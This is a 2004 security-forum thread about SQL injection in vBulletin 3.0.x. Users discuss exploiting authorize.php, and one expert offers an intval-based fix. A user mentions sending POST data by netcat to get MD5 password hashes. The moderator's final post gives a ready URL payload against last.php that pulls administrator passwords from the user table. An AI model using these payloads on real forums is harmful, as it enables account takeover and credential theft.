| 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Sql Inject In VB 3.0.x !! |  |  
	| 
	
		|  Posted: Thu Sep 16, 2004 8:18 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Zilly |  | Regular user |  |  
  |  |  |  | Joined: Sep 10, 2004 |  | Posts: 7 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| hi every body ,, thanx for the nice forums i like it   
 any way i want every body to take a look at this
 http://www.securiteam.com/unixfocus/5BP0E15E0M.html
 
  well, its sql inject,, i'm studying it this days and i kinda wana help in this, 
 how to Execute this security hole and another important thing is how to fix it ??
 
 thats all folks
  |  |  
		| 
		
			| _________________
 Zilly is Here
  |  |  |  
	|  |  
	|  | Re: Sql Inject In VB 3.0.x !! |  |  
	| 
	
		|  Posted: Thu Sep 16, 2004 10:39 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Heintz |  | Valuable expert |  |  
  |  |  |  | Joined: Jun 12, 2004 |  | Posts: 88 |  | Location: Estonia/Sweden |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Zilly wrote: |  	  | hi every body ,, thanx for the nice forums i like it   
 any way i want every body to take a look at this
 http://www.securiteam.com/unixfocus/5BP0E15E0M.html
 
  well, its sql inject,, i'm studying it this days and i kinda wana help in this, 
 how to Execute this security hole and another important thing is how to fix it ??
 
 thats all folks
  | 
 
 strange thing is that intval()- is used to get the value, but not used before passing to query
  . anyway the trick is to "continue" (in this case here) sql query.
 
 query ends like this: userid = " . $item_number[1]
 
 so you POST your value to item_number. name of it is x_invoice_num and its value is something like valuea_valueb_valuec, ju must manipulate valueb,  lets assume you posted something like this:
 
 then (depends on viewing part of script) you should see somewhere on the page, a list of tables that are in that database. and with little thinking you make more "useful" queries that this
   hint: mysql manual
 
 fixing:
 
  	  | Code: |  	  | $item_number[1] = abs(intval($item_number[1]));
 
 | 
 add this line somewhere before the query, and it should do it
 |  |  
		| 
		
			| _________________
 AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
 |  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Fri Sep 17, 2004 5:41 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Zilly |  | Regular user |  |  
  |  |  |  | Joined: Sep 10, 2004 |  | Posts: 7 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| thanx Heintz,, well i know some how that the file that contains the sql inject is authorize.php 
 what i'm tryin to do now is to inject but can i ask a question ??
 
 when we use the authorize.php ?
 
 i mean in normal not injecting ??
 
 and thanx again ,,
 
 Zilly
 |  |  
		| 
		
			| _________________
 Zilly is Here
  |  |  |  
	|  |  
	| 
	
		|  Posted: Fri Sep 17, 2004 4:13 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| zer0-c00l |  | Advanced user |  |  
  |  |  |  | Joined: Jun 25, 2004 |  | Posts: 72 |  | Location: BRAZIL! |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Sep 17, 2004 5:35 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| hebe |  | Advanced user |  |  
  |  |  |  | Joined: Sep 04, 2004 |  | Posts: 59 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| is there any exploit for this |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Sep 17, 2004 8:49 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| SteX |  | Advanced user |  |  
  |  |  |  | Joined: May 18, 2004 |  | Posts: 181 |  | Location: Serbia |  |  
 
 |  |  
			|  |  |  
 
 |  |  
		| 
		
			| _________________
 
   We would change the world, but God won't give us the sourcecode...
 ....Watch the master. Follow the master. Be the master....
 -------------------------------------------------------
 |  |  |  
	|  |  
	| 
	
		|  Posted: Sun Sep 19, 2004 8:42 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I have played a little bit with that security bug and got some results. Will share them tomorrow in this thread, so stay tuned!!!
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Wed Sep 22, 2004 8:36 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Zilly |  | Regular user |  |  
  |  |  |  | Joined: Sep 10, 2004 |  | Posts: 7 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| wow thanx man 
 my brain has been exploed LOL
   
 this time really i will not change the channel
     
 Zilly
 |  |  
		| 
		
			| _________________
 Zilly is Here
  |  |  |  
	|  |  
	| 
	
		|  Posted: Tue Nov 09, 2004 6:48 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Zilly |  | Regular user |  |  
  |  |  |  | Joined: Sep 10, 2004 |  | Posts: 7 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| after searching and reading and like this stuff i found that i can excute this expliot by netcat
 ex:
 nc -n -v ***.***.***.*** 80
 then i have to enter some POST command
 after that i'll get the MD5 hash password ..
 
 okay now we are near ...
   
 and i need help also ..
 
 
  |  |  
		| 
		
			| _________________
 Zilly is Here
  |  |  |  
	|  |  
	| 
	
		|  Posted: Fri Nov 12, 2004 6:10 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| LINUX |  | Moderator |  |  
  |  |  |  | Joined: May 24, 2004 |  | Posts: 404 |  | Location: Caiman |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| new SQL injection found in VBulletin Forums 3.0.x 
 the Vulnerabilite found in last.php, last 10 topics hack.
 
 
 last.php?fsel=,user.password%20as%20title,user.%20
 %20%20%20username%20as%20lastposter%20FROM%20user,
 thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
 
 
 enjoy
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> Sql injection 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |